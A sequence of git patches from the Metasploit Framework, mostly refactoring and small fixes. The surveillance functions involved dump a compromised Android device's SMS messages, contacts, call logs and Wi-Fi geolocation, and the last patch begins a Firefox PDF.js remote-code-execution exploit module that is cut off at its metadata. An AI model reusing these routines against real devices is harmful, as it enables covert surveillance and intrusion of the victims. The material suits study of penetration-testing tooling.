--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -9,7 +9,7 @@ PATH
       json
       metasploit-concern (= 1.0.0)
       metasploit-model (= 1.0.0)
-      metasploit-payloads (= 1.0.7)
+      metasploit-payloads (= 1.0.8)
       msgpack
       nokogiri
       packetfu (= 1.1.9)
@@ -123,7 +123,7 @@ GEM
       activemodel (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)
       railties (>= 4.0.9, < 4.1.0)
-    metasploit-payloads (1.0.7)
+    metasploit-payloads (1.0.8)
     metasploit_data_models (1.2.5)
       activerecord (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)
diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec
index 4a4436e160..eb2924b3bd 100644
--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -61,7 +61,7 @@ Gem::Specification.new do |spec|
   # are needed when there's no database
   spec.add_runtime_dependency 'metasploit-model', '1.0.0'
   # Needed for Meterpreter
-  spec.add_runtime_dependency 'metasploit-payloads', '1.0.7'
+  spec.add_runtime_dependency 'metasploit-payloads', '1.0.8'
   # Needed by msfgui and other rpc components
   spec.add_runtime_dependency 'msgpack'
   # Needed by anemone crawler

From 3615bd094d84d6d6e5b52fa4f190ca875f3bb31d Mon Sep 17 00:00:00 2001
From: Brent Cook <bcook@rapid7.com>
Date: Fri, 14 Aug 2015 17:58:33 -0500
Subject: [PATCH 0987/1013] limit the # of bssids sent to google, log more
 error details

---
 lib/rex/google_geolocation.rb | 6 ++++--
 1 file changed, 4 insertions(+), 2 deletions(-)

diff --git a/lib/rex/google_geolocation.rb b/lib/rex/google_geolocation.rb
index 86d1527b65..62597c1012 100755
--- a/lib/rex/google_geolocation.rb
+++ b/lib/rex/google_geolocation.rb
@@ -24,7 +24,7 @@ module Rex
     # Ask Google's Maps API for the location of a given set of BSSIDs (MAC
     # addresses of access points), ESSIDs (AP names), and signal strengths.
     def fetch!
-      @uri.query << @wlan_list.join("&wifi=")
+      @uri.query << @wlan_list.take(10).join("&wifi=")
       request = Net::HTTP::Get.new(@uri.request_uri)
       http = Net::HTTP.new(@uri.host, @uri.port)
       http.use_ssl = true
@@ -36,7 +36,9 @@ module Rex
         self.longitude = results["location"]["lng"]
         self.accuracy = results["accuracy"]
       else
-        fail "Failure connecting to Google for location lookup."
+        msg = "Failure connecting to Google for location lookup."
+        msg += " Code #{response.code} for query #{@uri.to_s}" if response
+        fail msg
       end
     end
 

From 42e08cbe0706507dc9fb683cf8eaed232be3486c Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Fri, 14 Aug 2015 19:50:42 -0500
Subject: [PATCH 0988/1013] Fix bad use of get_profile (now browser_profile)

---
 modules/exploits/windows/browser/adobe_flash_avm2.rb            | 2 +-
 .../windows/browser/adobe_flash_filters_type_confusion.rb       | 2 +-
 modules/exploits/windows/browser/adobe_flash_pcre.rb            | 2 +-
 modules/exploits/windows/browser/adobe_flash_regex_value.rb     | 2 +-
 4 files changed, 4 insertions(+), 4 deletions(-)

diff --git a/modules/exploits/windows/browser/adobe_flash_avm2.rb b/modules/exploits/windows/browser/adobe_flash_avm2.rb
index 09aacbcc77..7815ef80db 100644
--- a/modules/exploits/windows/browser/adobe_flash_avm2.rb
+++ b/modules/exploits/windows/browser/adobe_flash_avm2.rb
@@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     print_status("Sending HTML...")
     tag = retrieve_tag(cli, request)
-    profile = get_profile(tag)
+    profile = browser_profile[tag]
     profile[:tried] = false unless profile.nil? # to allow request the swf
     send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
   end
diff --git a/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb b/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb
index e6a4e7468c..ac3e425873 100644
--- a/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb
+++ b/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb
@@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     print_status("Sending HTML...")
     tag = retrieve_tag(cli, request)
-    profile = get_profile(tag)
+    profile = browser_profile[tag]
     profile[:tried] = false unless profile.nil? # to allow request the swf
     send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
   end
diff --git a/modules/exploits/windows/browser/adobe_flash_pcre.rb b/modules/exploits/windows/browser/adobe_flash_pcre.rb
index d922dfbb3c..f000571844 100644
--- a/modules/exploits/windows/browser/adobe_flash_pcre.rb
+++ b/modules/exploits/windows/browser/adobe_flash_pcre.rb
@@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     print_status("Sending HTML...")
     tag = retrieve_tag(cli, request)
-    profile = get_profile(tag)
+    profile = browser_profile[tag]
     profile[:tried] = false unless profile.nil? # to allow request the swf
     send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
   end
diff --git a/modules/exploits/windows/browser/adobe_flash_regex_value.rb b/modules/exploits/windows/browser/adobe_flash_regex_value.rb
index d5bc974bc1..7cd4e5d44e 100644
--- a/modules/exploits/windows/browser/adobe_flash_regex_value.rb
+++ b/modules/exploits/windows/browser/adobe_flash_regex_value.rb
@@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     print_status("Sending HTML...")
     tag = retrieve_tag(cli, request)
-    profile = get_profile(tag)
+    profile = browser_profile[tag]
     profile[:tried] = false unless profile.nil? # to allow request the swf
     send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
   end

From 875ac289e0a99b9eca3fc9e2a3ef7b71cb413b2d Mon Sep 17 00:00:00 2001
From: Brent Cook <bcook@rapid7.com>
Date: Sat, 15 Aug 2015 19:44:48 -0500
Subject: [PATCH 0989/1013] wait up to time_out seconds for output from the
 command

---
 lib/msf/core/post/common.rb | 13 +++++++++++--
 1 file changed, 11 insertions(+), 2 deletions(-)

diff --git a/lib/msf/core/post/common.rb b/lib/msf/core/post/common.rb
index 7f4db478d9..0b604162a1 100644
--- a/lib/msf/core/post/common.rb
+++ b/lib/msf/core/post/common.rb
@@ -101,6 +101,7 @@ module Msf::Post::Common
       # through /bin/sh, solving all the pesky parsing troubles, without
       # affecting Windows.
       #
+      start = Time.now.to_i
       if args.nil? and cmd =~ /[^a-zA-Z0-9\/._-]/
         args = ""
       end
@@ -108,9 +109,17 @@ module Msf::Post::Common
       session.response_timeout = time_out
       process = session.sys.process.execute(cmd, args, {'Hidden' => true, 'Channelized' => true})
       o = ""
+      # Wait up to time_out seconds for the first bytes to arrive
       while (d = process.channel.read)
-        break if d == ""
-        o << d
+        if d == ""
+          if (Time.now.to_i - start < time_out) && (o == '')
+            sleep 0.1
+          else
+            break
+          end
+        else
+          o << d
+        end
       end
       o.chomp! if o
 

From 1db376bed88a36c11c23d52b13d71e76212b4619 Mon Sep 17 00:00:00 2001
From: Brent Cook <bcook@rapid7.com>
Date: Sat, 15 Aug 2015 19:46:04 -0500
Subject: [PATCH 0990/1013] check if a process still exists before deleting it

---
 data/meterpreter/ext_server_stdapi.py | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/data/meterpreter/ext_server_stdapi.py b/data/meterpreter/ext_server_stdapi.py
index 9e487280be..e884267528 100644
--- a/data/meterpreter/ext_server_stdapi.py
+++ b/data/meterpreter/ext_server_stdapi.py
@@ -742,7 +742,8 @@ def stdapi_sys_process_close(request, response):
 	if not proc_h_id:
 		return ERROR_SUCCESS, response
 	proc_h_id = proc_h_id['value']
-	del meterpreter.processes[proc_h_id]
+	if meterpreter.processes.has_key(proc_h_id):
+		del meterpreter.processes[proc_h_id]
 	return ERROR_SUCCESS, response
 
 @meterpreter.register_function

From 422bba87d352bfd8815349ee190de8cbd1207cfc Mon Sep 17 00:00:00 2001
From: Brent Cook <bcook@rapid7.com>
Date: Sat, 15 Aug 2015 19:49:32 -0500
Subject: [PATCH 0991/1013] style fixes, moved google_geolocate to
 google/geolocate

---
 lib/rex/google/geolocation.rb                 |  68 ++++++
 lib/rex/google_geolocation.rb                 |  66 ------
 .../ui/console/command_dispatcher/android.rb  | 198 ++++++++----------
 modules/post/multi/gather/wlan_geolocate.rb   |   5 +-
 tools/google_geolocate_bssid.rb               |   4 +-
 5 files changed, 158 insertions(+), 183 deletions(-)
 create mode 100755 lib/rex/google/geolocation.rb
 delete mode 100755 lib/rex/google_geolocation.rb

diff --git a/lib/rex/google/geolocation.rb b/lib/rex/google/geolocation.rb
new file mode 100755
index 0000000000..3afc328ddf
--- /dev/null
+++ b/lib/rex/google/geolocation.rb
@@ -0,0 +1,68 @@
+#!/usr/bin/env ruby
+
+require 'net/http'
+require 'json'
+
+module Rex
+  module Google
+    # @example
+    #   g = Rex::Google::Geolocation.new
+    #   g.add_wlan("00:11:22:33:44:55", "example", -80)
+    #   g.fetch!
+    #   puts g, g.google_maps_url
+    class Geolocation
+      GOOGLE_API_URI = "https://maps.googleapis.com/maps/api/browserlocation/json?browser=firefox&sensor=true&"
+
+      attr_accessor :accuracy
+      attr_accessor :latitude
+      attr_accessor :longitude
+
+      def initialize
+        @uri = URI.parse(URI.encode(GOOGLE_API_URI))
+        @wlan_list = []
+      end
+
+      # Ask Google's Maps API for the location of a given set of BSSIDs (MAC
+      # addresses of access points), ESSIDs (AP names), and signal strengths.
+      def fetch!
+        @uri.query << @wlan_list.take(10).join("&wifi=")
+        request = Net::HTTP::Get.new(@uri.request_uri)
+        http = Net::HTTP.new(@uri.host, @uri.port)
+        http.use_ssl = true
+        response = http.request(request)
+
+        if response && response.code == '200'
+          results = JSON.parse(response.body)
+          self.latitude = results["location"]["lat"]
+          self.longitude = results["location"]["lng"]
+          self.accuracy = results["accuracy"]
+        else
+          msg = "Failure connecting to Google for location lookup."
+          msg += " Code #{response.code} for query #{@uri}" if response
+          fail msg
+        end
+      end
+
+      # Add an AP to the list to send to Google when {#fetch!} is called.
+      #
+      # Turns out Google's API doesn't really care about ESSID or signal strength
+      # as long as you have BSSIDs. Presumably adding them will make it more
+      # accurate? Who knows.
+      #
+      # @param mac [String] in the form "00:11:22:33:44:55"
+      # @param ssid [String] ESSID associated with the mac
+      # @param signal_strength [String] a thing like
+      def add_wlan(mac, ssid = nil, signal_strength = nil)
+        @wlan_list.push(URI.encode("mac:#{mac.upcase}|ssid:#{ssid}|ss=#{signal_strength.to_i}"))
+      end
+
+      def google_maps_url
+        "https://maps.google.com/?q=#{latitude},#{longitude}"
+      end
+
+      def to_s
+        "Google indicates the device is within #{accuracy} meters of #{latitude},#{longitude}."
+      end
+    end
+  end
+end
diff --git a/lib/rex/google_geolocation.rb b/lib/rex/google_geolocation.rb
deleted file mode 100755
index 62597c1012..0000000000
--- a/lib/rex/google_geolocation.rb
+++ /dev/null
@@ -1,66 +0,0 @@
-#!/usr/bin/env ruby
-
-require 'net/http'
-require 'json'
-
-module Rex
-  # @example
-  #   g = GoogleGeolocation.new
-  #   g.add_wlan("00:11:22:33:44:55", "example", -80)
-  #   g.fetch!
-  #   puts g, g.google_maps_url
-  class GoogleGeolocation
-    GOOGLE_API_URI = "https://maps.googleapis.com/maps/api/browserlocation/json?browser=firefox&sensor=true&"
-
-    attr_accessor :accuracy
-    attr_accessor :latitude
-    attr_accessor :longitude
-
-    def initialize
-      @uri = URI.parse(URI.encode(GOOGLE_API_URI))
-      @wlan_list = []
-    end
-
-    # Ask Google's Maps API for the location of a given set of BSSIDs (MAC
-    # addresses of access points), ESSIDs (AP names), and signal strengths.
-    def fetch!
-      @uri.query << @wlan_list.take(10).join("&wifi=")
-      request = Net::HTTP::Get.new(@uri.request_uri)
-      http = Net::HTTP.new(@uri.host, @uri.port)
-      http.use_ssl = true
-      response = http.request(request)
-
-      if response && response.code == '200'
-        results = JSON.parse(response.body)
-        self.latitude = results["location"]["lat"]
-        self.longitude = results["location"]["lng"]
-        self.accuracy = results["accuracy"]
-      else
-        msg = "Failure connecting to Google for location lookup."
-        msg += " Code #{response.code} for query #{@uri.to_s}" if response
-        fail msg
-      end
-    end
-
-    # Add an AP to the list to send to Google when {#fetch!} is called.
-    #
-    # Turns out Google's API doesn't really care about ESSID or signal strength
-    # as long as you have BSSIDs. Presumably adding them will make it more
-    # accurate? Who knows.
-    #
-    # @param mac [String] in the form "00:11:22:33:44:55"
-    # @param ssid [String] ESSID associated with the mac
-    # @param signal_strength [String] a thing like
-    def add_wlan(mac, ssid = nil, signal_strength = nil)
-      @wlan_list.push(URI.encode("mac:#{mac.upcase}|ssid:#{ssid}|ss=#{signal_strength.to_i}"))
-    end
-
-    def google_maps_url
-      "https://maps.google.com/?q=#{latitude},#{longitude}"
-    end
-
-    def to_s
-      "Google indicates the device is within #{accuracy} meters of #{latitude},#{longitude}."
-    end
-  end
-end
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
index 8a40c0ef04..7891523682 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
@@ -1,18 +1,16 @@
 # -*- coding: binary -*-
 require 'rex/post/meterpreter'
 require 'msf/core/auxiliary/report'
-require 'rex/google_geolocation'
+require 'rex/google/geolocation'
 
 module Rex
 module Post
 module Meterpreter
 module Ui
-
 ###
 # Android extension - set of commands to be executed on android devices.
 # extension by Anwar Mohamed (@anwarelmakrahy)
 ###
-
 class Console::CommandDispatcher::Android
   include Console::CommandDispatcher
   include Msf::Auxiliary::Report
@@ -28,8 +26,8 @@ class Console::CommandDispatcher::Android
       'dump_calllog'      => 'Get call log',
       'check_root'        => 'Check if device is rooted',
       'device_shutdown'   => 'Shutdown device',
-      'send_sms'	  => 'Sends SMS from target session',
-      'wlan_geolocate'    => 'Get current lat-long using WLAN information',
+      'send_sms'          => 'Sends SMS from target session',
+      'wlan_geolocate'    => 'Get current lat-long using WLAN information'
     }
 
     reqs = {
@@ -39,25 +37,24 @@ class Console::CommandDispatcher::Android
       'dump_calllog'    => [ 'dump_calllog' ],
       'check_root'      => [ 'check_root' ],
       'device_shutdown' => [ 'device_shutdown'],
-      'send_sms'	=> [ 'send_sms' ],
-      'wlan_geolocate'	=> [ 'wlan_geolocate' ]
+      'send_sms'        => [ 'send_sms' ],
+      'wlan_geolocate'  => [ 'wlan_geolocate' ]
     }
 
     # Ensure any requirements of the command are met
-    all.delete_if do |cmd, desc|
-      reqs[cmd].any? { |req| not client.commands.include?(req) }
+    all.delete_if do |cmd, _desc|
+      reqs[cmd].any? { |req| !client.commands.include?(req) }
     end
   end
 
   def cmd_device_shutdown(*args)
-
     seconds = 0
     device_shutdown_opts = Rex::Parser::Arguments.new(
       '-h' => [ false, 'Help Banner' ],
       '-t' => [ false, 'Shutdown after n seconds']
     )
 
-    device_shutdown_opts.parse(args) { | opt, idx, val |
+    device_shutdown_opts.parse(args) do |opt, _idx, val|
       case opt
       when '-h'
         print_line('Usage: device_shutdown [options]')
@@ -67,26 +64,25 @@ class Console::CommandDispatcher::Android
       when '-t'
         seconds = val.to_i
       end
-    }
+    end
 
     res = client.android.device_shutdown(seconds)
 
     if res
-      print_status("Device will shutdown #{seconds > 0 ?('after ' + seconds + ' seconds'):'now'}")
+      print_status("Device will shutdown #{seconds > 0 ? ('after ' + seconds + ' seconds') : 'now'}")
     else
       print_error('Device shutdown failed')
     end
   end
-  
-  def cmd_dump_sms(*args)
 
+  def cmd_dump_sms(*args)
     path = "sms_dump_#{Time.new.strftime('%Y%m%d%H%M%S')}.txt"
     dump_sms_opts = Rex::Parser::Arguments.new(
-        '-h' => [ false, 'Help Banner' ],
-        '-o' => [ false, 'Output path for sms list']
+      '-h' => [ false, 'Help Banner' ],
+      '-o' => [ false, 'Output path for sms list']
     )
 
-    dump_sms_opts.parse(args) { | opt, idx, val |
+    dump_sms_opts.parse(args) do |opt, _idx, val|
       case opt
       when '-h'
         print_line('Usage: dump_sms [options]')
@@ -96,19 +92,18 @@ class Console::CommandDispatcher::Android
       when '-o'
         path = val
       end
-    }
+    end
 
-    smsList = []
-    smsList = client.android.dump_sms
+    sms_list = client.android.dump_sms
 
-    if smsList.count > 0
-      print_status("Fetching #{smsList.count} sms #{smsList.count == 1? 'message': 'messages'}")
+    if sms_list.count > 0
+      print_status("Fetching #{sms_list.count} sms #{sms_list.count == 1 ? 'message' : 'messages'}")
       begin
         info = client.sys.config.sysinfo
 
         data = ""
         data << "\n=====================\n"
-        data << "[+] Sms messages dump\n"
+        data << "[+] SMS messages dump\n"
         data << "=====================\n\n"
 
         time = Time.new
@@ -117,8 +112,7 @@ class Console::CommandDispatcher::Android
         data << "Remote IP: #{client.sock.peerhost}\n"
         data << "Remote Port: #{client.sock.peerport}\n\n"
 
-        smsList.each_with_index { |a, index|
-
+        sms_list.each_with_index do |a, index|
           data << "##{index.to_i + 1}\n"
 
           type = 'Unknown'
@@ -152,14 +146,14 @@ class Console::CommandDispatcher::Android
           data << "Address\t: #{a['address']}\n"
           data << "Status\t: #{status}\n"
           data << "Message\t: #{a['body']}\n\n"
-        }
+        end
 
         ::File.write(path, data)
-        print_status("Sms #{smsList.count == 1? 'message': 'messages'} saved to: #{path}")
+        print_status("SMS #{sms_list.count == 1 ? 'message' : 'messages'} saved to: #{path}")
 
         return true
       rescue
-        print_error("Error getting messages: #{$!}")
+        print_error("Error getting messages: #{$ERROR_INFO}")
         return false
       end
     else
@@ -168,18 +162,15 @@ class Console::CommandDispatcher::Android
     end
   end
 
-
   def cmd_dump_contacts(*args)
-
     path = "contacts_dump_#{Time.new.strftime('%Y%m%d%H%M%S')}.txt"
-    dump_contacts_opts = Rex::Parser::Arguments.new(
 
+    dump_contacts_opts = Rex::Parser::Arguments.new(
       '-h' => [ false, 'Help Banner' ],
       '-o' => [ false, 'Output path for contacts list']
-
     )
 
-    dump_contacts_opts.parse(args) { | opt, idx, val |
+    dump_contacts_opts.parse(args) do |opt, _idx, val|
       case opt
       when '-h'
         print_line('Usage: dump_contacts [options]')
@@ -189,13 +180,12 @@ class Console::CommandDispatcher::Android
       when '-o'
         path = val
       end
-    }
+    end
 
-    contactList = []
-    contactList = client.android.dump_contacts
+    contact_list = client.android.dump_contacts
 
-    if contactList.count > 0
-      print_status("Fetching #{contactList.count} #{contactList.count == 1? 'contact': 'contacts'} into list")
+    if contact_list.count > 0
+      print_status("Fetching #{contact_list.count} #{contact_list.count == 1 ? 'contact' : 'contacts'} into list")
       begin
         info = client.sys.config.sysinfo
 
@@ -210,32 +200,28 @@ class Console::CommandDispatcher::Android
         data << "Remote IP: #{client.sock.peerhost}\n"
         data << "Remote Port: #{client.sock.peerport}\n\n"
 
-        contactList.each_with_index { |c, index|
+        contact_list.each_with_index do |c, index|
 
           data << "##{index.to_i + 1}\n"
           data << "Name\t: #{c['name']}\n"
 
-          if c['number'].count > 0
-            (c['number']).each { |n|
-              data << "Number\t: #{n}\n"
-            }
+          c['number'].each do |n|
+            data << "Number\t: #{n}\n"
           end
 
-          if c['email'].count > 0
-            (c['email']).each { |n|
-              data << "Email\t: #{n}\n"
-            }
+          c['email'].each do |n|
+            data << "Email\t: #{n}\n"
           end
 
           data << "\n"
-        }
-  
+        end
+
         ::File.write(path, data)
         print_status("Contacts list saved to: #{path}")
 
         return true
       rescue
-        print_error("Error getting contacts list: #{$!}")
+        print_error("Error getting contacts list: #{$ERROR_INFO}")
         return false
       end
     else
@@ -248,13 +234,11 @@ class Console::CommandDispatcher::Android
 
     generate_map = false
     geolocate_opts = Rex::Parser::Arguments.new(
-
       '-h' => [ false, 'Help Banner' ],
       '-g' => [ false, 'Generate map using google-maps']
-
     )
 
-    geolocate_opts.parse(args) { | opt, idx, val |
+    geolocate_opts.parse(args) do |opt, _idx, _val|
       case opt
       when '-h'
         print_line('Usage: geolocate [options]')
@@ -264,7 +248,7 @@ class Console::CommandDispatcher::Android
       when '-g'
         generate_map = true
       end
-    }
+    end
 
     geo = client.android.geolocate
 
@@ -283,7 +267,6 @@ class Console::CommandDispatcher::Android
   end
 
   def cmd_dump_calllog(*args)
-
     path = "calllog_dump_#{Time.new.strftime('%Y%m%d%H%M%S')}.txt"
     dump_calllog_opts = Rex::Parser::Arguments.new(
 
@@ -292,7 +275,7 @@ class Console::CommandDispatcher::Android
 
     )
 
-    dump_calllog_opts.parse(args) { | opt, idx, val |
+    dump_calllog_opts.parse(args) do |opt, _idx, val|
       case opt
       when '-h'
         print_line('Usage: dump_calllog [options]')
@@ -302,12 +285,12 @@ class Console::CommandDispatcher::Android
       when '-o'
         path = val
       end
-    }
+    end
 
     log = client.android.dump_calllog
 
     if log.count > 0
-      print_status("Fetching #{log.count} #{log.count == 1? 'entry': 'entries'}")
+      print_status("Fetching #{log.count} #{log.count == 1 ? 'entry' : 'entries'}")
       begin
         info = client.sys.config.sysinfo
 
@@ -322,23 +305,21 @@ class Console::CommandDispatcher::Android
         data << "Remote IP: #{client.sock.peerhost}\n"
         data << "Remote Port: #{client.sock.peerport}\n\n"
 
-        log.each_with_index { |a, index|
-
+        log.each_with_index do |a, index|
           data << "##{index.to_i + 1}\n"
-
           data << "Number\t: #{a['number']}\n"
           data << "Name\t: #{a['name']}\n"
           data << "Date\t: #{a['date']}\n"
           data << "Type\t: #{a['type']}\n"
           data << "Duration: #{a['duration']}\n\n"
-        }
+        end
 
         ::File.write(path, data)
         print_status("Call log saved to #{path}")
 
         return true
       rescue
-        print_error("Error getting call log: #{$!}")
+        print_error("Error getting call log: #{$ERROR_INFO}")
         return false
       end
     else
@@ -347,15 +328,13 @@ class Console::CommandDispatcher::Android
     end
   end
 
-
-
   def cmd_check_root(*args)
 
     check_root_opts = Rex::Parser::Arguments.new(
       '-h' => [ false, 'Help Banner' ]
     )
 
-    check_root_opts.parse(args) { | opt, idx, val |
+    check_root_opts.parse(args) do |opt, _idx, _val|
       case opt
       when '-h'
         print_line('Usage: check_root [options]')
@@ -363,13 +342,13 @@ class Console::CommandDispatcher::Android
         print_line(check_root_opts.usage)
         return
       end
-    }
+    end
 
     is_rooted = client.android.check_root
 
     if is_rooted
       print_good('Device is rooted')
-    elsif
+    else
       print_status('Device is not rooted')
     end
   end
@@ -381,10 +360,12 @@ class Console::CommandDispatcher::Android
       '-t' => [ true, 'SMS body text' ],
       '-dr' => [ false, 'Wait for delivery report' ]
     )
-    dest=''
-    body=''
-    dr=false
-    send_sms_opts.parse(args) { | opt, idx, val |
+
+    dest = ''
+    body = ''
+    dr = false
+
+    send_sms_opts.parse(args) do |opt, _idx, val|
       case opt
       when '-h'
         print_line('Usage: send_sms -d <number> -t <sms body>')
@@ -392,48 +373,48 @@ class Console::CommandDispatcher::Android
         print_line(send_sms_opts.usage)
         return
       when '-d'
-	dest=val
+        dest = val
       when '-t'
-	body=val
+        body = val
       when '-dr'
-	dr=true
+        dr = true
       end
-    }
-    if (dest.blank? or body.blank?)
-        print_error("You must enter both a destination address -d and the SMS text body -t")
-	print_error('e.g. send_sms -d +351961234567 -t "GREETINGS PROFESSOR FALKEN."')
-        print_line(send_sms_opts.usage)
-	return
     end
 
-    sent=client.android.send_sms(dest,body,dr)
-    if (dr)
-      if (sent[0]=="Transmission successful")
-          print_good("SMS sent - #{sent[0]}")
+    if dest.blank? || body.blank?
+      print_error("You must enter both a destination address -d and the SMS text body -t")
+      print_error('e.g. send_sms -d +351961234567 -t "GREETINGS PROFESSOR FALKEN."')
+      print_line(send_sms_opts.usage)
+      return
+    end
+
+    sent = client.android.send_sms(dest, body, dr)
+    if dr
+      if sent[0] == "Transmission successful"
+        print_good("SMS sent - #{sent[0]}")
       else
-          print_error("SMS send failed - #{sent[0]}")
+        print_error("SMS send failed - #{sent[0]}")
       end
-      if (sent[1]=="Transmission successful")
-          print_good("SMS delivered - #{sent[1]}")
+      if sent[1] == "Transmission successful"
+        print_good("SMS delivered - #{sent[1]}")
       else
-          print_error("SMS delivery failed - #{sent[1]}")
+        print_error("SMS delivery failed - #{sent[1]}")
       end
     else
-      if (sent=="Transmission successful")
-          print_good("SMS sent - #{sent}")
+      if sent == "Transmission successful"
+        print_good("SMS sent - #{sent}")
       else
-          print_error("SMS send failed - #{sent}")
+        print_error("SMS send failed - #{sent}")
       end
     end
   end
 
   def cmd_wlan_geolocate(*args)
-
     wlan_geolocate_opts = Rex::Parser::Arguments.new(
       '-h' => [ false, 'Help Banner' ]
     )
 
-    wlan_geolocate_opts.parse(args) { | opt, idx, val |
+    wlan_geolocate_opts.parse(args) do |opt, _idx, _val|
       case opt
       when '-h'
         print_line('Usage: wlan_geolocate')
@@ -441,23 +422,22 @@ class Console::CommandDispatcher::Android
         print_line(wlan_geolocate_opts.usage)
         return
       end
-    }
+    end
 
     log = client.android.wlan_geolocate
-    wlan_list=[]
-    wlan_str=""
-    log.each{|x|
-	mac=x['bssid']
-	ssid=x['ssid']
-	ss=x['level']
-	wlan_list << [mac,ssid,ss.to_s]
-    }
+    wlan_list = []
+    log.each do |x|
+      mac = x['bssid']
+      ssid = x['ssid']
+      ss = x['level']
+      wlan_list << [mac, ssid, ss.to_s]
+    end
 
     if wlan_list.blank?
       print_error("Unable to enumerate wireless networks from the target.  Wireless may not be present or enabled.")
       return
     end
-    g = Rex::GoogleGeolocation.new
+    g = Rex::Google::Geolocation.new
 
     wlan_list.each do |wlan|
       g.add_wlan(*wlan)
@@ -470,21 +450,15 @@ class Console::CommandDispatcher::Android
       print_status(g.to_s)
       print_status("Google Maps URL:  #{g.google_maps_url}")
     end
-
-
   end
 
-
-
   #
   # Name for this dispatcher
   #
   def name
     'Android'
   end
-
-end
-
+end
 end
 end
 end
diff --git a/modules/post/multi/gather/wlan_geolocate.rb b/modules/post/multi/gather/wlan_geolocate.rb
index 1c9d7d2f84..61709e327b 100644
--- a/modules/post/multi/gather/wlan_geolocate.rb
+++ b/modules/post/multi/gather/wlan_geolocate.rb
@@ -5,7 +5,7 @@
 
 require 'msf/core'
 require 'rex'
-require 'rex/google_geolocation'
+require 'rex/google/geolocation'
 
 class Metasploit3 < Msf::Post
 
@@ -84,12 +84,11 @@ class Metasploit3 < Msf::Post
   end
 
   def perform_geolocation(wlan_list)
-
     if wlan_list.blank?
       print_error("Unable to enumerate wireless networks from the target.  Wireless may not be present or enabled.")
       return
     end
-    g = Rex::GoogleGeolocation.new
+    g = Rex::Google::Geolocation.new
 
     wlan_list.each do |wlan|
       g.add_wlan(*wlan)
diff --git a/tools/google_geolocate_bssid.rb b/tools/google_geolocate_bssid.rb
index 20b532cbce..1c93b47150 100755
--- a/tools/google_geolocate_bssid.rb
+++ b/tools/google_geolocate_bssid.rb
@@ -9,7 +9,7 @@ while File.symlink?(msfbase)
 end
 
 $LOAD_PATH.unshift(File.expand_path(File.join(File.dirname(msfbase), '..', 'lib')))
-require 'rex/google_geolocation'
+require 'rex/google/geolocation'
 require 'optparse'
 
 if ARGV.empty?
@@ -21,7 +21,7 @@ if ARGV.empty?
   exit(1)
 end
 
-g = Rex::GoogleGeolocation.new
+g = Rex::Google::Geolocation.new
 ARGV.each do |mac|
   g.add_wlan(mac, nil, -83)
 end

From 9720e8e081c4175f07e9f14211f9c5858dcdc3af Mon Sep 17 00:00:00 2001
From: Brent Cook <bcook@rapid7.com>
Date: Sat, 15 Aug 2015 19:49:55 -0500
Subject: [PATCH 0992/1013] normalize osx to darwin so python meterp works

---
 modules/post/multi/gather/wlan_geolocate.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/post/multi/gather/wlan_geolocate.rb b/modules/post/multi/gather/wlan_geolocate.rb
index 61709e327b..cdb498623a 100644
--- a/modules/post/multi/gather/wlan_geolocate.rb
+++ b/modules/post/multi/gather/wlan_geolocate.rb
@@ -114,9 +114,9 @@ class Metasploit3 < Msf::Post
     else
       # For Meterpreter use the sysinfo OS since java Meterpreter returns java as platform
       platform = session.sys.config.sysinfo['OS']
+      platform = 'osx' if platform =~ /darwin/i
     end
 
-
     case platform
     when /win/i
 

From a133e98ba5870c5b02c2347018fd2ac07cad3fd6 Mon Sep 17 00:00:00 2001
From: joev <joev@metasploit.com>
Date: Sat, 15 Aug 2015 17:52:47 -0500
Subject: [PATCH 0993/1013] Adds a ff 35-36 RCE vector based off the recent ff
 bug.

---
 .../firefox_pdfjs_privilege_escalation.rb     | 256 ++++++++++++++++++
 .../multi/browser/firefox_proxy_prototype.rb  |   3 +-
 2 files changed, 258 insertions(+), 1 deletion(-)
 create mode 100644 modules/exploits/multi/browser/firefox_pdfjs_privilege_escalation.rb

diff --git a/modules/exploits/multi/browser/firefox_pdfjs_privilege_escalation.rb b/modules/exploits/multi/browser/firefox_pdfjs_privilege_escalation.rb
new file mode 100644
index 0000000000..6f189edac5
--- /dev/null
+++ b/modules/exploits/multi/browser/firefox_pdfjs_privilege_escalation.rb
@@ -0,0 +1,256 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Exploit::Remote::BrowserExploitServer
+  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'        => 'Firefox PDF.js Privileged Javascript Injection',
+      'Description' => %q{
+        This module gains remote code execution on Firefox 35-36 by abusing a
+        privilege escalation bug in resource:// URIs. PDF.js is used to exploit
+        the bug. This exploit requires the user to click anywhere on the page to
+        trigger the vulnerability.
+      },
+      'Author'         => [
+        'Unknown', # PDF.js injection injection code was taken from a 0day
